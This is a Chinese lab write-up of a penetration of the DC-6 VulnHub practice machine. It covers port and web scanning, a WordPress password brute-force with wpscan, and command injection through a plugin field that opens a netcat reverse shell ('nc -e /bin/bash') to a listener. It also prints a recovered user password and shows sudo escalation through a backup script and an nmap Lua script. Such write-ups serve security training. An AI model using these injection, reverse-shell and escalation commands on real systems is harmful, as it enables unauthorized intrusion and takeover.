当前位置: 首页 > news >正文

DC-6靶机渗透

一、环境搭建:

靶场下载地址:

<span style="background-color:#f4f4f4"><span style="color:#333333">https://www.vulnhub.com/entry/dc-6,315/</span></span>

二、渗透靶场

1、信息收集:寻找靶机真实IP

192.168.150.154

2信息收集:探端口及服务

nmap -p- -sV -sT -A -O 192.168.150.154

3、访问web服务

192.168.150.154

把IP 和域名写入 hosts 文件中

在/目录下

cat /etc/hosts

再次访问

4,信息收集:web指纹识别

Whatweb指纹识别

whatweb -v 192.168.150.154

5,使用扫描网站结构

nikto -h http://192.168.150.154 -o nikto-wordy.txt

访问该页面

<span style="background-color:#f4f4f4"><span style="color:#333333">http://wordy/wp-login.php</span></span>

6,获取用户密码
搜索用户名
<span style="background-color:#f4f4f4"><span style="color:#333333">wpscan --url wordy -e u</span></span>
发现5个用户

制作用户字典
<span style="background-color:#f4f4f4"><span style="color:#333333">vim wordy-users.dic</span></span>

制作密码字典
<span style="background-color:#f4f4f4"><span style="color:#333333">cd /usr/share/wordlists
cp rockyou.txt.gz rockyou.txt.gz.bak
gunzip rockyou.txt.gz rockyou.txt
cat /usr/share/wordlists/rockyou.txt | grep k01 > wordy-pass1.dic</span></span>

<span style="background-color:#f4f4f4"><span style="color:#333333">cat wordy-pass1.dic</span></span>
7,爆破密码
<span style="background-color:#f4f4f4"><span style="color:#333333">wpscan --url wordy -U wordy-users.dic -P wordy-pass1.dic</span></span>
<span style="background-color:#f4f4f4"><span style="color:#333333">wpscan --url http://wordy/ -U wordy-users.dic -P wordy-pass1.dic</span></span>

wpscan --url http://wordy/ --passwords 1.txt

登入

执行whoami

<span style="background-color:#f4f4f4"><span style="color:#333333">http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
8.8.8.8;whoami</span></span>

将这里修改为114.114.114.114;whoami

开启监听

nc -lvnp 55555

114.114.114.114;nc -e /bin/bash 192.168.150.145 55555

监听成功

进入交互式shell

<span style="background-color:#f4f4f4"><span style="color:#333333">www-data@dc-6:/var/www/html/wp-admin$ </span></span>

开始提权

sudo -l

需要密码

cd /home/mark/stuff

cat things-to-do.txt

发现账户

发现密码

graham - GSo7isUM1D4

输入这个

<span style="background-color:#f4f4f4"><span style="color:#333333">python -c 'import pty; pty.spawn("/bin/bash")'</span></span>

切换用户

查看备份文件

cat /home/jens/backups.sh

发现里面是如下命令,是对web的文件进行打包备份

切换到jens目录下

<span style="background-color:#f4f4f4"><span style="color:#333333">echo "/bin/bash" >> backups.sh
sudo -u jens ./backups.sh</span></span>

<span style="background-color:#f4f4f4"><span style="color:#333333">echo 'os.execute("/bin/sh")' > getShell
sudo  nmap  --script=getShell</span></span>

 好小子,离成功又近一步!!!


http://www.mrgr.cn/news/49586.html

相关文章:

  • MyBatis环境配置详细过程
  • 【Qt】窗口关闭提示框
  • C语言有关结构体的知识(后有通讯录的实现)
  • 【国科大】C++程序设计秋季——五子棋
  • 利用编程思维做题之将两个有序的单链表合并成一个新的有序单链表
  • 小红书系统教程05(小红书本质)
  • linux手册翻译 execve
  • 【英特尔IA-32架构软件开发者开发手册第3卷:系统编程指南】2001年版翻译,1-7
  • 公开课 | 2024最新清华大模型公开课 第3课 神经网络与大模型基础 Part 2
  • openpyxl -- Cell
  • 中国中铁下属设计院盘点
  • Base16编码解码在线工具
  • RabbitMQ 如何保证消息不丢失?
  • VS中创建QT项目。
  • 【环境搭建】更换电脑后的开发环境怎么重建
  • 双目视觉搭配YOLO实现3D测量
  • 【双指针算法】移动零
  • 6.Pytest快速上手
  • 从经济学原理看团队分工合作
  • 动态规划基础与经典问题